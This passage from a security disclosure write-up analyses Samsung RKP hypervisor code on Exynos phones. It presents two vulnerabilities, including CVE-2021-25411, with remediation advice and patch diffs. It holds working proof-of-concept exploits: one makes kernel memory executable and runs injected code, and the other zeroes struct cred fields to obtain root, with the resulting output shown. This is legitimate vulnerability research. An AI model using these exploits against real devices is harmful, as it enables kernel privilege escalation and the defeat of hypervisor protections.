} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
if (!res) {
uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
}
} else {
res = 0;
}
// Put the return code in the memory referenced by x4.
ret_va = regs->x4;
if (ret_va) {
*virt_to_phys_el1(ret_va) = res;
}
// Put the return code in x0.
regs->x0 = res;
return res;
}
The RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT
subcommand is of no interest to us since it can only be called prior to initialization.
The RKP_DYN_COMMAND_INS
subcommand, used to load a binary, is handled by dynamic_load_ins
. It calls a bunch of functions sequentially:
dynamic_load_check
to validate the executable's information;dynamic_load_protection
to make the code segment(s) R-X
in the stage 2;dynamic_load_verify_signing
to verify the executable's signature;dynamic_load_make_rox
to make the code segment(s) R-X
in the stage 1;dynamic_load_add_executable
to add the code segment(s) to the executable_regions
memlist;dynamic_load_add_dynlist
to add the executable to the dynamic_load_regions
memlist.If any of the functions it calls fail, except dynamic_load_check
, it will try to undo its changes by calling the same functions as in the unloading path.
int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Validate the argument structure.
if (dynamic_load_check(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
return 0xf13c0001;
}
// Make the code segment(s) read-only executable in the stage 2.
if (dynamic_load_protection(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
res = 0xf13c0002;
goto EXIT_RW;
}
// Verify the signature of the dynamic executable.
if (dynamic_load_verify_signing(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
res = 0xf13c0003;
goto EXIT_RW;
}
// Make the code segment(s) read-only executable in the stage 1.
if (dynamic_load_make_rox(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
res = 0xf13c0004;
goto EXIT_SET_PXN;
}
// Add the code segment(s) to the executable_regions memlist.
if (dynamic_load_add_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
res = 0xf13c0005;
goto EXIT_RM_EXECUTABLE;
}
// Add the binary's address range to the dynamic_load_regions memlist.
if (dynamic_load_add_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
res = 0xf13c0006;
goto EXIT_RM_DYNLIST;
}
return 0;
EXIT_RM_DYNLIST:
// Undo: remove the binary's address range from the dynamic_load_regions memlist.
if (dynamic_load_rm_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
}
EXIT_RM_EXECUTABLE:
// Undo: remove the code segment(s) from the executable_regions memlist.
if (dynamic_load_rm_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
}
EXIT_SET_PXN:
// Undo: make the code segment(s) read-only non-executable in the stage 1.
if (dynamic_load_set_pxn(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
}
EXIT_RW:
// Undo: make the code segment(s) read-write executable in the stage 2.
if (dynamic_load_rw(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
}
return res;
}
The RKP_DYN_COMMAND_RM
subcommand, used to unload a binary, is handled by dynamic_load_rm
. It also calls a bunch of functions sequentially:
dynamic_load_rm_dynlist
to remove the executable from the dynamic_load_regions
memlist;dynamic_load_rm_executable
to remove the code segment(s) from the executable_regions
memlist;dynamic_load_set_pxn
to make the code segment(s) R--
in the stage 1;dynamic_load_rw
to make the code segment(s) RWX
in the stage 2.int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the binary's address range from the dynamic_load_regions memlist.
if (dynamic_load_rm_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
res = 0xf13c0007;
}
// Make the code segment(s) read-only non-executable in the stage 1.
else if (dynamic_load_rm_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
res = 0xf13c0008;
}
// Remove the code segment(s) from the executable_regions memlist.
else if (dynamic_load_set_pxn(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
res = 0xf13c0009;
}
// Make the code segment(s) read-write executable in the stage 2.
else if (dynamic_load_rw(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
res = 0xf13c000a;
} else {
res = 0;
}
return res;
}
dynamic_load_check
ensures the address range of the binary doesn't overlap with other currently loaded binaries and with memory that is read-only in the stage 2. Unfortunately, this is not enough. In particular, it doesn't ensure that the code segments are within the binary's address range. Please note that if pgt_bitmap_overlaps_range
returns an error, ul_log
is called with a D
(debug) log level, which will result in a panic.
int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Dynamic executables of type RKP_DYN_MODULE are not allowed to be loaded.
if (rkp_dyn->type == RKP_DYN_MODULE) {
return -1;
}
// Check if the binary's address range overlaps with the dynamic_load_regions memlist.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
rkp_dyn->binary_size);
return -1;
}
// Check if any of the pages of the binary's address range is marked read-only in the ro_bitmap.
if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
}
return 0;
}
dynamic_load_protection
makes the code segment(s) R-X
in the stage 2 by calling rkp_s2_range_change_permission
.
int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-only executable in the second stage.
code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80 /* read-only */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
rkp_dyn->code_size1);
return -1;
}
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Make the second code segment read-only executable in the second stage.
code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80 /* read-only */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
rkp_dyn->code_size2);
return -1;
}
return 0;
}
dynamic_load_verify_signing
verifies the signature of the whole binary's address space (remember that the binary's code and data were copied into that space by the kernel). Signature verification can be disabled by the kernel by setting NO_FIMC_VERIFY
in the rkp_start
command.
int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Check if signature verification was disabled by the kernel in rkp_start.
if (NO_FIMC_VERIFY) {
uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
return 0;
}
// Only the signature of RKP_DYN_FIMC and RKP_DYN_FIMC_COMBINED dynamic executables is checked.
if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Call fmic_signature_verify that does the actual signature checking.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
rkp_dyn->binary_size);
return -1;
}
uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
rkp_dyn->binary_size);
return 0;
}
dynamic_load_make_rox
makes the code segment(s) R-X
in the stage 1 by calling rkp_set_range_to_rox
.
int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-only executable in the first stage.
res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Make the second code segment read-only executable in the first stage.
res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
}
return res;
}
dynamic_load_add_executable
adds the code segment(s) to the list of executable memory regions.
int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Add the first code segment to the executable_regions memlist.
res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Add the second code segment to the executable_regions memlist.
res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
}
return res;
}
dynamic_load_add_dynlist
adds the binary's address range to the list of dynamically loaded executables.
int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Allocate a copy of the argument strucutre.
dynlist_entry = static_heap_alloc(0x38, 0);
memcpy(dynlist_entry, rkp_dyn, 0x38);
// Add the binary's address range to the dynamic_load_regions memlist and save the binary information alongside.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}
dynamic_load_rm_dynlist
removes the binary's address range from the list of dynamically loaded executables.
int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the binary's address range from the dynamic_load_regions memlist and retrieve the saved binary information.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
if (res) {
return res;
}
if (!dynlist_entry) {
uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
return -11;
}
// Compare the first code segment base address and size with the saved binary information.
res = 0;
if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
--res;
}
// Compare the second code segment base address and size with the saved binary information.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
(rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
--res;
}
// Free the copy the argument structure.
static_heap_free(dynlist_entry);
return res;
}
dynamic_load_rm_executable
removes the code segment(s) from the list of executable memory regions.
int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the first code segment to the executable_regions memlist.
res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Remove the first code segment to the executable_regions memlist.
res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
}
return res;
}
dynamic_load_set_pxn
makes the code segment(s) non-executable in the stage 1 by calling rkp_set_range_to_pxn
.
int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment non-executable in the first stage.
res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Make the second code segment non-executable in the first stage.
res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
}
return res;
}
dynamic_load_rw
makes the code segment(s) RWX
in the stage 2 by calling rkp_s2_range_change_permission
.
int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-write executable in the second stage.
code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0 /* read-write */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
rkp_dyn->code_size1);
return -1;
}
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Make the second code segment read-write executable in the second stage.
code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
rkp_dyn->code_size2);
return -1;
}
return 0;
}
From the high-level description of the functions given above, we can notice in particular that if we give a code segment that is currently R-X
or RW-
in the stage 2, dynamic_load_protection
will make it R-X
. And if an error occurs after that, dynamic_load_rw
will be called to undo the changes and make it RWX
, regardless of the original permissions. Thus, we can effectively make kernel memory executable.
In practice, to pass the checks in dynamic_load_check
, we need to specify a binary_base
that is in writable memory in the stage 2, but code_base1
and code_base2
can be in read-only memory. Now, to trigger a failure, we can specify a code_base2
that is not page-aligned. That way, the second call to rkp_s2_range_change_permission
in dynamic_load_protection
will fail, and dynamic_load_rw
will be executed. The second call to rkp_s2_range_change_permission
in dynamic_load_rw
will also fail, but that's not an issue.
The vulnerability allows us to change memory that is currently R-X
or RW-
in the stage 2 to RWX
. In order to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1, so that we only have to modify the stage 2 permissions. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap
) as a second mapping that is writable. By writing our code to this second mapping and executing it from the first, we can achieve arbitrary code execution.
stage 1 stage 2
EXEC_VA ---------+--------> TARGET_PA
R-X | R-X
| ^---- will be changed to RWX
WRITE_VA ---------+
RW-
By dumping the page tables of the stage 1, we can easily find a double-mapped page.
...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...
If our executable mapping is at 0xFFFFFF80FA500000, we can deduce that the writable mapping will be at 0xFFFFFFC87571F000:
>>> EXEC_VA = 0xFFFFFF80FA6FF000
>>> TARGET_PA = EXEC_VA - 0xFFFFFF80FA500000 + 0x00000008F5520000
>>> TARGET_PA
0x8F571F000
>>> WRITE_VA = 0xFFFFFFC800000000 + TARGET_PA - 0x0000000880000000
>>> WRITE_VA
0xFFFFFFC87571F000
And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X
.
...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...
The last important thing we need to take into account when writing our exploit are caches (data and instructions). To be safe, in our exploit, we decided to prefix the code to execute with some "bootstrap" instructions that will clean the caches.
#define UH_APP_RKP 0xC300C002
#define RKP_DYNAMIC_LOAD 0x20
#define RKP_DYN_COMMAND_INS 0x01
#define RKP_DYN_FIMC_COMBINED 0x03
/* these 2 VAs point to the same PA */
#define EXEC_VA 0xFFFFFF80FA6FF000UL
#define WRITE_VA 0xFFFFFFC87571F000UL
/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xD50B7520D5087620UL
#define DSB_ISH_ISB 0xD5033FDFD5033B9FUL
void exploit() {
/* fill the structure given as argument */
uint64_t rkp_dyn = kernel_alloc(0x38);
kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000)); // binary_base
kernel_write(rkp_dyn + 0x10, 0x1000); // binary_size
kernel_write(rkp_dyn + 0x18, EXEC_VA); // code_base1
kernel_write(rkp_dyn + 0x20, 0x1000); // code_size1
kernel_write(rkp_dyn + 0x28, EXEC_VA + 1); // code_base2
kernel_write(rkp_dyn + 0x30, 0x1000); // code_size2
/* call the hypervisor to make the page RWX */
kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);
/* copy the code using the writable mapping */
uint32_t code[] = {
0xDEADBEEF,
0,
};
kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
kernel_write(WRITE_VA + 0x10 + i * 8, code[i * 2]);
/* and execute it using the executable mapping */
kernel_exec(EXEC_VA, WRITE_VA);
}
As a result of running the proof of concept, we get an undefined instruction exception that we can observe in the kernel log (note the (deadbeef)
part):
<2>[ 207.365236] [3: rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[ 207.365310] [3: rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[ 207.365338] [3: rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[ 207.365361] [3: rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[ 207.365372] [3: rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[ 207.365386] [3: rkp_exploit:15549] Modules linked in:
<0>[ 207.365401] [3: rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[ 207.365418] [3: rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[ 207.365430] [3: rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[ 207.365438] [3: rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[ 207.365456] [3: rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[ 207.365468] [3: rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[ 207.365480] [3: rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[ 207.365491] [3: rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[ 207.365541] [3: rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[ 207.365574] [3: rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[ 207.365590] [3: rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G W 4.14.113 #14
<4>[ 207.365602] [3: rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[ 207.365617] [3: rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[ 207.365632] [3: rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[ 207.365644] [3: rkp_exploit:15549] LR is at 0xffffff80fa6ff004
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The two-fold bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.
Here are the immediate remediation steps we suggested to Samsung:
- Implement thorough checking in the "dynamic executable" commands:
- The code segment(s) should not overlap any read-only pages
(maybe checking the ro_bitmap or calling is_phys_map_free is enough)
- dynamic_load_rw should not make the code segment(s) executable on failure
(to prevent abusing it to create executable kernel pages...)
- Ensure signature checking is enabled (it was disabled on some devices)
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
Changes were made to the dynamic_load_check
function. As suggested, checks were added to ensure that both code segments are within the binary's address range. While the new checks don't account for integer overflows on all the base + size
additions, but we noticed that was changed later in the October security update.
int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
// ...
if (rkp_dyn->type == RKP_DYN_MODULE)
return -1;
+ binary_base = rkp_dyn->binary_base;
+ binary_end = rkp_dyn->binary_size + binary_base;
+ code_base1 = rkp_dyn->code_base1;
+ code_end1 = rkp_dyn->code_size1 + code_base1;
+ if (code_base1 < binary_base || code_end1 > binary_end) {
+ uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+ return -1;
+ }
+ if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+ code_base2 = rkp_dyn->code_base2;
+ code_end2 = rkp_dyn->code_size2 + code_base2;
+ if (code_base2 < binary_base || code_end2 > binary_end) {
+ uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+ return -1;
+ }
+ if ((code_base1 > code_base2 && code_base1 < code_end2)
+ || (code_base2 > code_base1 && code_base2 < code_end1)) {
+ uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+ return -1;
+ }
+ }
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
return -1;
}
if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
return 0;
}
Since the binary's address range is then checked against the ro_bitmap
using pgt_bitmap_overlaps_range
, it is no longer possible to change memory from R-X
to RWX
in the stage 2. It is still possible to change memory that is RW-
to RWX
, but there are already RWX
pages in the stage 2. The hypervisor also ensures that if such a page is mapped as executable in the stage 1, it is made read-only in the stage 2.
SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory
Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.
The last vulnerability comes from a limitation of virt_to_phys_el1
, the function used by RKP to convert a virtual address into a physical address.
It uses the AT S12E1R
(Address Translate Stages 1 and 2 EL1 Read) and AT S12E1W
(Address Translate Stages 1 and 2 EL1 Write) instructions that perform a full (stages 1 and 2) address translation, as if the kernel was trying to read or write, respectively, at that virtual address. By checking the PAR_EL1
(Physical Address Register) register, the function can know if the address translation succeeded and retrieve the physical address.
Most specifically, virt_to_phys_el1
uses AT S12E1R
, and if that first address translation fails, it then uses AT S12E1W
. That means that any virtual address that can be read and/or written by the kernel can be successfully translated by the function.
uint64_t virt_to_phys_el1(uint64_t addr) {
// ...
// Ignore null VAs.
if (!addr) {
return 0;
}
cs_enter(s2_lock);
// Try to translate the VA using the AT S12E1R instruction (simulate a kernel read).
ats12e1r(addr);
isb();
par_el1 = get_par_el1();
// Check the PAR_EL1 register to see if the AT succeeded.
if ((par_el1 & 1) != 0) {
// Try again to translate the VA using the AT S12E1W instruction (simulate a kernel write).
ats12e1w(addr);
isb();
par_el1 = get_par_el1();
}
cs_exit(s2_lock);
// Check the PAR_EL1 register to see if the AT succeeded.
if ((par_el1 & 1) != 0) {
isb();
// If the MMU is enabled, log and print the stack contents (only once).
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
if (!dword_87035098) {
dword_87035098 = 1;
print_stack_contents();
}
dword_87035098 = 0;
}
return 0;
}
// If the AT succeeded, return the output PA.
else {
return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
}
}
The issue is that functions will call virt_to_phys_el1
to convert a kernel VA, some times to read from it, other times to write to it. However, since virt_to_phys_el1
still translates the VA even if it is only readable, we can abuse this oversight to write to memory that is read-only from the kernel.
Interesting targets in kernel memory include anything that is read-only in the stage 2, such as the kernel page tables, struct cred
, struct task_security_struct
, etc. We also need to find a command handler that uses the virt_to_phys_el1
function, writes to the translated address, and can be called after the hypervisor is fully initialized. There are only two command handlers that fit the bill:
rkp_cmd_rkp_robuffer_alloc
, which writes the address of the newly allocated page;int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
page = page_allocator_alloc_page();
ret_va = regs->x2;
// ...
if (ret_va) {
// ...
*virt_to_phys_el1(ret_va) = page;
}
regs->x0 = page;
return 0;
}
rkp_cmd_dynamic_load
, which writes the return code of the subcommand.int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
// ...
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
// ...
} else {
res = 0;
}
ret_va = regs->x4;
if (ret_va) {
*virt_to_phys_el1(ret_va) = res;
}
regs->x0 = res;
return res;
}
In our exploit, we have used rkp_cmd_dynamic_load
because when an invalid subcommand is specified, the return code and thus the value that is written to the target address is 0. This is very useful, for example, to change a UID/GID to 0 (root
).
#define UH_APP_RKP 0xC300C002
#define RKP_DYNAMIC_LOAD 0x20
void print_ids() {
uid_t ruid, euid, suid;
getresuid(&ruid, &eudi, &suid);
printf("Uid: %d %d %d\n", ruid, euid, suid);
gid_t rgid, egid, sgid;
getresgid(&rgid, &egid, &sgid);
printf("Gid: %d %d %d\n", rgid, egid, sgid);
}
void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}
void exploit() {
/* print the old credentials */
print_ids();
/* get the struct cred of the current task */
uint64_t current = kernel_get_current();
uint64_t cred = kernel_read(current + 0x7B0);
/* allocate the argument structure */
uint64_t rkp_dyn_p = kernel_alloc(0x38);
/* zero the fields of the struct cred */
for (int i = 4; i < 0x24; i += 4)
write_zero(rkp_dyn_p, cred + i);
/* print the new credentials */
print_ids();
}
Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0
By running the proof of concept, we can see that the current task's credentials changed from 2000 (shell
) to 0 (root
).
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.
Here is the immediate remediation step that we suggested to Samsung:
- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
Changes were made to the rkp_cmd_rkp_robuffer_alloc
function. It now ensures the kernel-provided address is marked as FREE
in the physmap
before writing to it and triggers a policy violation if it isn't.
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
// ...
page = page_allocator_alloc_page();
ret_va = regs->x2;
// ...
if (ret_va) {
// ...
- *virt_to_phys_el1(ret_va) = page;
+ ret_pa = virt_to_phys_el1(ret_va);
+ rkp_phys_map_lock(ret_pa);
+ if (!is_phys_map_free(ret_pa)) {
+ rkp_phys_map_unlock(ret_pa);
+ rkp_policy_violation("RKP_07fb818a");
+ }
+ *ret_pa = page;
+ rkp_phys_map_unlock(ret_pa);
}
regs->x0 = page;
return 0;
}
Similar changes were made to the rkp_cmd_dynamic_load
function.
int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
// ...
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
// ...
} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
// ...
} else {
res = 0;
}
ret_va = regs->x4;
- if (ret_va)
- *virt_to_phys_el1(ret_va) = res;
+ if (ret_va) {
+ ret_pa = rkp_get_pa(ret_va);
+ rkp_phys_map_lock(ret_pa);
+ if (!is_phys_map_free(ret_pa)) {
+ rkp_phys_map_unlock(ret_pa);
+ rkp_policy_violation("RKP_07fb818a");
+ }
+ rkp_phys_map_unlock(ret_pa);
+ *ret_pa = res;
+ }
regs->x0 = res;
return res;
}
The patch works right now because there are no other command handlers accessible after initialization that use virt_to_phys_el1
